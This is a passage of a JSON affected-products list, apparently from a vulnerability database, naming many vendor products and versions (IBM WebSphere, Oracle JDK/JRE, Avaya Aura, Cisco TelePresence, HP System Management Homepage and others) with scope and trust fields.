"scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3850x571430" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "tivoli storage manager operations center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.07" }, { "model": "bbm on blackberry os", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "100" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.051" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "bes12 client", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "12.0.0.70" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "ctp", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.14" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.3" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.19" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.37" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.045" }, { "model": "work space manager for bes10/bes12 24144 68", "scope": null, "trust": 0.3, "vendor": "blackberry", "version": null }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.2" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.3.0.5" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "java sdk sr16-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.14" }, { "model": "sametime community server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.3" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.303" }, { "model": "tivoli workload scheduler distributed fp07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "content collector for sap applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.5" }, { "model": "business process manager advanced", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.5" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x375087330" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.024" }, { "model": "dataquant", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.20" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.2" }, { "model": "jre 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2.0.3" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.1" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.23" }, { "model": "enterprise", "scope": "ne", "trust": 0.3, "vendor": "splunk", "version": "6.2.2" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.1.0.7" }, { "model": "mate live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.02" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.12" }, { "model": "tivoli workload scheduler distributed fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "flashsystem 9848-ae2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v90000" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.038" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0.1.104" }, { "model": "chassis management module 2pet12f", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.10" }, { "model": "nsm", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.040" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.4" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.10" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "bbm protected on android", "scope": "ne", "trust": 0.3, "vendor": "blackberry", "version": "2.7.0.6" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.11" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0.0" }, { "model": "work space manager for bes10/bes12 25374 241", "scope": null, "trust": 0.3, "vendor": "blackberry", "version": null }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "pulse secure", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.041" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.029" }, { "model": "initiate master data service provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "flashcopy manager for unix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "websphere real time", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1.2" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.5" }, { "model": "java sdk r1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1.73" }, { "model": "telepresence isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "java sdk 7r1 sr2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310054570" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "network node manager ispi for ip multicast qa", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.1" }, { "model": "telepresence ex series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flashcopy manager for db2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.9" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2.0" }, { "model": "rational reporting for development intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x363073770" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "aura conferencing sp7", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1841" }, { "model": "database 12c release", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "112.11" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "netezza platform software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "linux enterprise module for legacy software", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "12" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl 1.0.0h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "infosphere identity insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.21" }, { "model": "flashsystem 9846-ae2", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v90007.5.1.0" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.9.5" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.179" }, { "model": "aura utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.010" }, { "model": "tivoli netcool configuration manager if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.6003" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.027" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.022" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.4" }, { "model": "aura system manager sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "sterling connect:direct browser ifix10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5.3" }, { "model": "alienvault", "scope": "eq", "trust": 0.3, "vendor": "alienvault", "version": "4.15" }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.2" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "norman shark network protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "video surveillance 4300e/4500e high-definition ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.2.0.5" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "system type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x3950x638370" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "cognos insight standard edition fp if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.2.124" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.0" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational agent controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "aura utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "sterling control center ifix04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.2.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.6.1.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.5" }, { "model": "java sdk sr16-fp8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x365054540" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "platform cluster manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "jdk update17", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "ctpos 6.6r5", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.1.0.7" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.13" }, { "model": "websphere real time sr fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3810" }, { "model": "domino if", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.07" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "tivoli asset management for it", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "workcentre 3025bi", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "3.50.01.10" }, { "model": "sterling connect:direct browser ifix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.212" }, { "model": "tivoli common reporting", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.033" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "netscaler service delivery appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.7" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "clustered data ontap antivirus connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.2" }, { "model": "sterling control center ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.1.0" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "53000" }, { "model": "jre 1.6.0 31", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.021" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "jdk 0 03", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "java sdk sr9", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "jdk update20", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "db2 query management facility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.1" }, { "model": "session border controller for enterprise", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.0" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "telepresence isdn gw mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83210" }, { "model": "bbm on ios", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.302" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.3" }, { "model": "cics transaction gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.10" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.4" }, { "model": "network node manager ispi performance for qa", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.1" }, { "model": "systems insight manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.7" }, { "model": "blend for windows", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.4" }, { "model": "rational build utility", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.4.750" }, { "model": "system m5 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x325054580" }, { "model": "security identity manager virtual appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "chassis management module 2peo12i", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.4" }, { "model": "notes fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.36" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3.0.0" }, { "model": "lotus quickr for websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "flashcopy manager for custom applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)5.1" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.060" }, { "model": "flashcopy manager for unix and linux", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.1" }, { "model": "chassis management module 2pet10c", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.02" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "chassis management module 2pet10f", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli network performance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3" }, { "model": "sterling control center ifix02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.34" }, { "model": "jdk update21", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.10" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.6" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "upward integration modules scvmm add-in", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "java sdk sr13-fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355042540" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "network node manager ispi performance for metrics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.029" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.6" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.5" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.2" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.1" }, { "model": "one-x client enablement services sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "x-series xos", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "9.7" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5.2" }, { "model": "blend for ios", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "0" }, { "model": "sterling connect:direct browser user interface", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.10" }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.06" }, { "model": "tivoli monitoring fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.5" }, { "model": "websphere process server hypervisor edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2" }, { "model": "phaser", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "30523.50.01.11" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.1.1" }, { "model": "work space manager for bes10/bes12 24651 124", "scope": null, "trust": 0.3, "vendor": "blackberry", "version": null }, { "model": "enterprise", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.2" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1.3" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.1.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.842" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.28" }, { "model": "xiv storage system gen3 a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.1.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.0" }, { "model": "telepresence te software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.030" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9.1.11" }, { "model": "java sdk sr13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.209" }, { "model": "jre 1.5.0 09-b03", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.41" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "tivoli storage manager for virtual environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.0.0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1.0" }, { "model": "enterprise linux server eus 6.6.z", "scope": null, "trust": 0.3, "vendor": "redhat", "version": null }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.0.4" }, { "model": "norman shark network protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.0" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.051" }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, 